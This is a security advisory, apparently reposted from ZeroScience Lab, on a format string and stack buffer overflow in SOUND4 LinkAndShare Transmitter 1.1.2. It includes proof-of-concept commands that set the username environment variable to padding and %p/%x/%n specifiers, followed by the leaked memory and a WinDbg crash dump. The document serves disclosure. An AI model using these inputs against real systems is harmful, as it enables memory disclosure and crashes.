SOUND4 LinkAndShare Transmitter 1.1.2 Format String Stack Buffer Overflow

2023.02.12
Credit: LiquidWorm
Risk: High
Local: No
Remote: Yes
CVE: N/A

SOUND4 LinkAndShare Transmitter 1.1.2 Format String Stack Buffer Overflow Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: 1.1.2 Summary: The SOUND4 Link&Share (L&S) is a simple and open protocol that allow users to remotely control SOUND4 processors through a network connection. SOUND4 offers a tool that manage sending L&S commands to your processors: the Link&Share Transmitter. Desc: The application suffers from a format string memory leak and stack buffer overflow vulnerability because it fails to properly sanitize user supplied input when calling the getenv() function from MSVCR120.DLL resulting in a crash overflowing the memory stack and leaking sensitive information. The attacker can abuse the username environment variable to trigger and potentially execute code on the affected system. --------------------------------------------------------------------------- (4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!) eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000 eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 MSVCR120!_invoke_watson+0xe: 645046b1 cd29 int 29h --------------------------------------------------------------------------- Tested on: Microsoft Windows 10 Home Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5744 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5744.php 26.09.2022 -- C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDd%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>02/02/23 17:06:19 : : Internal Error: can not replace file with temp file 02/02/23 17:06:19 : Background launch: User: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDd00000000013872CB0000000A012FF644776BE9250200000277666A78C60003C50000000077651CFC00000000012FF8B07770C59F0138F9D832EC2962011AE00000000000011B100000000001FFFFFC3E012FF814776A7252776A8D3B32EC29C60138000000000440012FF8B00138F0EC013889420000000001386DB000000006000000003B00003B00001000000000060000000301380294013800000200000200000000C60003C57769517C000000000000000100000000012FF764012FF75877694F2600FC000000FC0000012FF79800000008000003010000033C000000010139CF800000000000000087FFFFFCC40000000000000000000001F4013800010010002F00000001000000010000000002020002536E6957206B636F00302E3201380000012FF76400000000000007FF000003C5013800C0013899A4FFFFFFFE012FF7CC00000000000000000138CD100000008900000001000000000000033C012FF7CC000003450000000077694D110138C148000004480138CD10012FF800013800C001380000002C000200000001010001000000033C0139CF78012FF788000002BC0139CF780139CF8044B51122000000000000000000000AF00000000077694A9C770100BA01389918002FF8883B00003B000000000000033C013899180139CF7F00000000012FF7E0012FFB64776DAE6044B517CAFFFFFFFE012FF8A8776A6F0C00000440012FF9CC776A7252776A8D3B6E75521E676E696E00000200012FFA680138CD10012FF8687769470000000000012FF888776610783B00003B776D2D2C00000448FFFFFFFF00EC8D180000000002000002000000003F00033C00000003FFFFFFFF0000000000EC8D180139CF80002C0000000004400000000000EC8D180138000000EB0000000002BF000002FA0000510A32EC00000139D3C0013800000000000000EC8D18229F00000138898C0000002000000001012FFB103B00003BD1B0FD8E0000000000ECB3AC61636F6C736F686C0138007400051000000000090000000F34303033013800000138999000630069000000040000000F000000000069006400000080006F0056000000000000000F013927F8000002BC0000033C006100720000002F0000002F0065000000200073013800C00139D3C0000000000000000F010001000000004200000001006E0069000000000000000F0139D300013803AC000000010138C148000000000000000F000000000001007401389918013800C03B00003B0139D3C8000000000101991800000000013800C0006E00610000033C013A78A044B50000FFFFFF0000000AF0000000350000003F01389918010103AC000002BC0000002000260007012FFA88013AB160012FFA80776A634F0000004F00000B4000000B4F01380000776E7BC40139D3C80000002000180017012FFAB801392504012FFAB0776A634F00000051000000200000000E01380000012FFA44012FFA8C01399FE8012FFA5432EC2BEA0000003C776C4EB00139FE0C000000400000000E00ECA7300000000D000000000139FE10012FFA9067F0C042012FFA8867EEEE0C67fc0e0012ffac867ef2b40867f0bf8167f0bfbcc25352e4e776c4eb0deca73012ffac8776bac49512ffac412ffb0c1399fe812ffad432ec2b6a512ffafc67eef8c70012ffb0c67eef8d612ffb0c67eef90b013872ca12ffb1c67f0e537013872ca139c3e0139eda81399fe8eb1b0112ffb3467f0e5849094dec12ffb74ec89edeb0000013872cba9094db0ec88beec88be11ae0000013872cb12ffb40012ffbd0ec8ae98cba554012ffb8476f700f911ae00076f700e012ffbe0776c7bbe11ae00032ec2a320011ae000000000000012ffb90012ffbe8776dae6044b51d72012ffbf0776c7b8effffffff776e8d1d00ec88be11ae0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA --- C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=%n C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe (4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!) eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000 eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 MSVCR120!_invoke_watson+0xe: 645046b1 cd29 int 29h 0:000> kb # ChildEBP RetAddr Args to Child 00 0119f0b4 64504677 00000000 00000000 00000000 MSVCR120!_invoke_watson+0xe [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132] 01 0119f0d0 64504684 00000000 00000000 00000000 MSVCR120!_invalid_parameter+0x2a [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 85] 02 0119f0e8 644757a7 0119f3bc 016b3908 016b3908 MSVCR120!_invalid_parameter_noinfo+0xc [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 96] 03 0119f37c 644e4d1f 0119f39c 016b2ba0 00000000 MSVCR120!_output_l+0xb49 [f:\dd\vctools\crt\crtw32\stdio\output.c @ 1690] 04 0119f3bc 644e4c99 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf_l+0x81 [f:\dd\vctools\crt\crtw32\stdio\vsprintf.c @ 138] *** WARNING: Unable to verify checksum for c:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter\LinkAndShareTransmitter.exe *** ERROR: Module load completed but symbols could not be loaded for c:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter\LinkAndShareTransmitter.exe 05 0119f3d8 0100bb11 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf+0x16 [f:\dd\vctools\crt\crtw32\stdio\vsprintf.c @ 190] WARNING: Stack unwind information not available. Following frames may be wrong. 06 0119f498 0100bc9f 016b2ba0 0119f4b4 0119f9c4 LinkAndShareTransmitter+0xbb11 07 0119f4a8 01002f58 016b2ba0 00000000 01687ffb LinkAndShareTransmitter+0xbc9f 08 0119f9c4 010189ed 01000000 00000000 01687ffb LinkAndShareTransmitter+0x2f58 09 0119fa10 76f700f9 01323000 76f700e0 0119fa7c LinkAndShareTransmitter+0x189ed 0a 0119fa20 776c7bbe 01323000 c0289fff 00000000 KERNEL32!BaseThreadInitThunk+0x19 0b 0119fa7c 776c7b8e ffffffff 776e8d13 00000000 ntdll!__RtlUserThreadStart+0x2f 0c 0119fa8c 00000000 010188be 01323000 00000000 ntdll!_RtlUserThreadStart+0x1b 0:000> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* GetUrlPageData2 (WinHttp) failed: 12002. DUMP_CLASS: 2 DUMP_QUALIFIER: 0 FAULTING_IP: MSVCR120!_invoke_watson+e [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132] 645046b1 cd29 int 29h EXCEPTION_RECORD: (.exr -1) ExceptionAddress: 645046b1 (MSVCR120!_invoke_watson+0x0000000e) ExceptionCode: c0000409 (Security check failure or stack buffer overrun) ExceptionFlags: 00000001 NumberParameters: 1 Parameter[0]: 00000005 Subcode: 0x5 FAST_FAIL_INVALID_ARG FAULTING_THREAD: 000059e8 DEFAULT_BUCKET_ID: FAIL_FAST_INVALID_ARG PROCESS_NAME: LinkAndShareTransmitter.exe ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_CODE_STR: c0000409 EXCEPTION_PARAMETER1: 00000005 WATSON_BKT_PROCSTAMP: 6144495e WATSON_BKT_PROCVER: 1.1.0.2 PROCESS_VER_PRODUCT: Sound4 Link&Share Transmitter WATSON_BKT_MODULE: MSVCR120.dll WATSON_BKT_MODSTAMP: 577e0f1e WATSON_BKT_MODOFFSET: a46b1 WATSON_BKT_MODVER: 12.0.40660.0 MODULE_VER_PRODUCT: Microsoft® Visual Studio® 2013 BUILD_VERSION_STRING: 10.0.19041.2364 (WinBuild.160101.0800) MODLIST_WITH_TSCHKSUM_HASH: 938db164a2b944fa7c2a5efef0c4e9b0f4b8e3d5 MODLIST_SHA1_HASH: 5990094944fb37a3f4c159affa51a53b6a58ac20 NTGLOBALFLAG: 70 APPLICATION_VERIFIER_FLAGS: 0 PRODUCT_TYPE: 1 SUITE_MASK: 784 DUMP_TYPE: fe ANALYSIS_SESSION_HOST: LAB17 ANALYSIS_SESSION_TIME: 01-29-2023 16:09:48.0143 ANALYSIS_VERSION: 10.0.16299.91 x86fre THREAD_ATTRIBUTES: OS_LOCALE: ENU PROBLEM_CLASSES: ID: [0n270] Type: [FAIL_FAST] Class: Primary Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix) BUCKET_ID Name: Add Data: Omit PID: [Unspecified] TID: [Unspecified] Frame: [0] ID: [0n257] Type: [INVALID_ARG] Class: Addendum Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix) BUCKET_ID Name: Add Data: Omit PID: [Unspecified] TID: [Unspecified] Frame: [0] BUGCHECK_STR: FAIL_FAST_INVALID_ARG PRIMARY_PROBLEM_CLASS: FAIL_FAST LAST_CONTROL_TRANSFER: from 64504677 to 645046b1 STACK_TEXT: 0119f0b4 64504677 00000000 00000000 00000000 MSVCR120!_invoke_watson+0xe 0119f0d0 64504684 00000000 00000000 00000000 MSVCR120!_invalid_parameter+0x2a 0119f0e8 644757a7 0119f3bc 016b3908 016b3908 MSVCR120!_invalid_parameter_noinfo+0xc 0119f37c 644e4d1f 0119f39c 016b2ba0 00000000 MSVCR120!_output_l+0xb49 0119f3bc 644e4c99 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf_l+0x81 0119f3d8 0100bb11 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf+0x16 WARNING: Stack unwind information not available. Following frames may be wrong. 0119f498 0100bc9f 016b2ba0 0119f4b4 0119f9c4 LinkAndShareTransmitter+0xbb11 0119f4a8 01002f58 016b2ba0 00000000 01687ffb LinkAndShareTransmitter+0xbc9f 0119f9c4 010189ed 01000000 00000000 01687ffb LinkAndShareTransmitter+0x2f58 0119fa10 76f700f9 01323000 76f700e0 0119fa7c LinkAndShareTransmitter+0x189ed 0119fa20 776c7bbe 01323000 c0289fff 00000000 KERNEL32!BaseThreadInitThunk+0x19 0119fa7c 776c7b8e ffffffff 776e8d13 00000000 ntdll!__RtlUserThreadStart+0x2f 0119fa8c 00000000 010188be 01323000 00000000 ntdll!_RtlUserThreadStart+0x1b STACK_COMMAND: ~0s ; .cxr ; kb THREAD_SHA1_HASH_MOD_FUNC: 0b8f8316052b30cae637e16edbb425a676500e95 THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 359d5607a5627480201647a1bc659e9d2ac9281f THREAD_SHA1_HASH_MOD: 2418d74468f3882fef267f455cd32d7651645882 FOLLOWUP_IP: MSVCR120!_invoke_watson+e [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132] 645046b1 cd29 int 29h FAULT_INSTR_CODE: 6a5629cd FAULTING_SOURCE_LINE: f:\dd\vctools\crt\crtw32\misc\invarg.c FAULTING_SOURCE_FILE: f:\dd\vctools\crt\crtw32\misc\invarg.c FAULTING_SOURCE_LINE_NUMBER: 132 SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: MSVCR120!_invoke_watson+e FOLLOWUP_NAME: MachineOwner MODULE_NAME: MSVCR120 IMAGE_NAME: MSVCR120.dll DEBUG_FLR_IMAGE_TIMESTAMP: 577e0f1e BUCKET_ID: FAIL_FAST_INVALID_ARG_MSVCR120!_invoke_watson+e FAILURE_EXCEPTION_CODE: c0000409 FAILURE_IMAGE_NAME: MSVCR120.dll BUCKET_ID_IMAGE_STR: MSVCR120.dll FAILURE_MODULE_NAME: MSVCR120 BUCKET_ID_MODULE_STR: MSVCR120 FAILURE_FUNCTION_NAME: _invoke_watson BUCKET_ID_FUNCTION_STR: _invoke_watson BUCKET_ID_OFFSET: e BUCKET_ID_MODTIMEDATESTAMP: 577e0f1e BUCKET_ID_MODCHECKSUM: f8aef BUCKET_ID_MODVER_STR: 12.0.40660.0 BUCKET_ID_PREFIX_STR: FAIL_FAST_INVALID_ARG_ FAILURE_PROBLEM_CLASS: FAIL_FAST FAILURE_SYMBOL_NAME: MSVCR120.dll!_invoke_watson FAILURE_BUCKET_ID: FAIL_FAST_INVALID_ARG_c0000409_MSVCR120.dll!_invoke_watson WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/LinkAndShareTransmitter.exe/1.1.0.2/6144495e/MSVCR120.dll/12.0.40660.0/577e0f1e/c0000409/000a46b1.htm?Retriage=1 TARGET_TIME: 2023-01-29T15:09:52.000Z OSBUILD: 19044 OSSERVICEPACK: 2364 SERVICEPACK_NUMBER: 0 OS_REVISION: 0 OSPLATFORM_TYPE: x86 OSNAME: Windows 10 OSEDITION: Windows 10 WinNt SingleUserTS Personal USER_LCID: 0 OSBUILD_TIMESTAMP: 2008-01-07 11:33:18 BUILDDATESTAMP_STR: 160101.0800 BUILDLAB_STR: WinBuild BUILDOSVER_STR: 10.0.19041.2364 ANALYSIS_SESSION_ELAPSED_TIME: 635d ANALYSIS_SOURCE: UM FAILURE_ID_HASH_STRING: um:fail_fast_invalid_arg_c0000409_msvcr120.dll!_invoke_watson FAILURE_ID_HASH: {c9fee478-4ed1-0d2b-ddd7-dca655d9817f} Followup: MachineOwner --------- 0:000> d MSVCP120 70fb0000 4d 5a 90 00 03 00 00 00-04 00 00 00 ff ff 00 00 MZ.............. 70fb0010 b8 00 00 00 00 00 00 00-40 00 00 00 00 00 00 00 ........@....... 70fb0020 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 70fb0030 00 00 00 00 00 00 00 00-00 00 00 00 f8 00 00 00 ................ 70fb0040 0e 1f ba 0e 00 b4 09 cd-21 b8 01 4c cd 21 54 68 ........!..L.!Th 70fb0050 69 73 20 70 72 6f 67 72-61 6d 20 63 61 6e 6e 6f is program canno 70fb0060 74 20 62 65 20 72 75 6e-20 69 6e 20 44 4f 53 20 t be run in DOS 70fb0070 6d 6f 64 65 2e 0d 0d 0a-24 00 00 00 00 00 00 00 mode....$....... 0:000> lmvm MSVCR120 Browse full module list start end module name 64460000 6454e000 MSVCR120 (private pdb symbols) C:\ProgramData\dbg\sym\msvcr120.i386.pdb\4D11E607E50346DDAB0C2C4FFC8716112\msvcr120.i386.pdb Loaded symbol image file: C:\WINDOWS\SYSTEM32\MSVCR120.dll Image path: C:\WINDOWS\SysWOW64\MSVCR120.dll Image name: MSVCR120.dll Browse all global symbols functions data Timestamp: Thu Jul 7 10:13:18 2016 (577E0F1E) CheckSum: 000F8AEF ImageSize: 000EE000 File version: 12.0.40660.0 Product version: 12.0.40660.0 File flags: 0 (Mask 3F) File OS: 4 Unknown Win32 File type: 2.0 Dll File date: 00000000.00000000 Translations: 0409.04b0 CompanyName: Microsoft Corporation ProductName: Microsoft® Visual Studio® 2013 InternalName: msvcr120.dll OriginalFilename: msvcr120.dll ProductVersion: 12.00.40660.0 FileVersion: 12.00.40660.0 built by: VSULDR FileDescription: Microsoft® C Runtime Library LegalCopyright: © Microsoft Corporation. All rights reserved. 0:000> x /D /f MSVCR120!getenv MSVCR120!getenv (char *) 0:000> x /D /f MSVCR120!getenv 64477785 MSVCR120!getenv (char *) .. 0:000> u 64477785 MSVCR120!getenv [f:\dd\vctools\crt\crtw32\misc\getenv.c @ 75]: 64477785 6a0c push 0Ch 64477787 68f0774764 push offset MSVCR120!_CT??_R0?AVbad_caststd+0x66c (644777f0) 6447778c e8ea75ffff call MSVCR120!__SEH_prolog4 (6446ed7b) 64477791 8365e400 and dword ptr [ebp-1Ch],0 64477795 33c0 xor eax,eax 64477797 8b7508 mov esi,dword ptr [ebp+8] 6447779a 85f6 test esi,esi 6447779c 0f95c0 setne al 0:000> r eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000 eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 MSVCR120!_invoke_watson+0xe: 645046b1 cd29 int 29h 0:000> u 645046b1 MSVCR120!_invoke_watson+0xe [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132]: 645046b1 cd29 int 29h 645046b3 56 push esi 645046b4 6a01 push 1 645046b6 be170400c0 mov esi,0C0000417h 645046bb 56 push esi 645046bc 6a02 push 2 645046be e85efeffff call MSVCR120!_call_reportfault (64504521) 645046c3 56 push esi 0:000> u 64477785 MSVCR120!getenv [f:\dd\vctools\crt\crtw32\misc\getenv.c @ 75]: 64477785 6a0c push 0Ch 64477787 68f0774764 push offset MSVCR120!_CT??_R0?AVbad_caststd+0x66c (644777f0) 6447778c e8ea75ffff call MSVCR120!__SEH_prolog4 (6446ed7b) 64477791 8365e400 and dword ptr [ebp-1Ch],0 64477795 33c0 xor eax,eax 64477797 8b7508 mov esi,dword ptr [ebp+8] 6447779a 85f6 test esi,esi 6447779c 0f95c0 setne al 0:000> g WARNING: Continuing a non-continuable exception (4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!) eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000 eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 MSVCR120!_invoke_watson+0xe: 645046b1 cd29 int 29h --- C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=%a.%b.%c.%d.%e.%f.%g.%h.%x.AAAAAAAAAAAAAA.%x.BBBAAAAAAAA=%p=AAAAA.%xAAAAA C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>02/02/23 17:11:44 : : Internal Error: can not replace file with temp file 02/02/23 17:11:44 : Background launch: User: 0x1.7474b0p-1019.b. .1897752.3.147818e+267.1445459053534108500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000.000000.1.36157e+267..0.AAAAAAAAAAAAAA.1cf784.BBBAAAAAAAA=7770C59F=AAAAA.47c778AAAAA


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top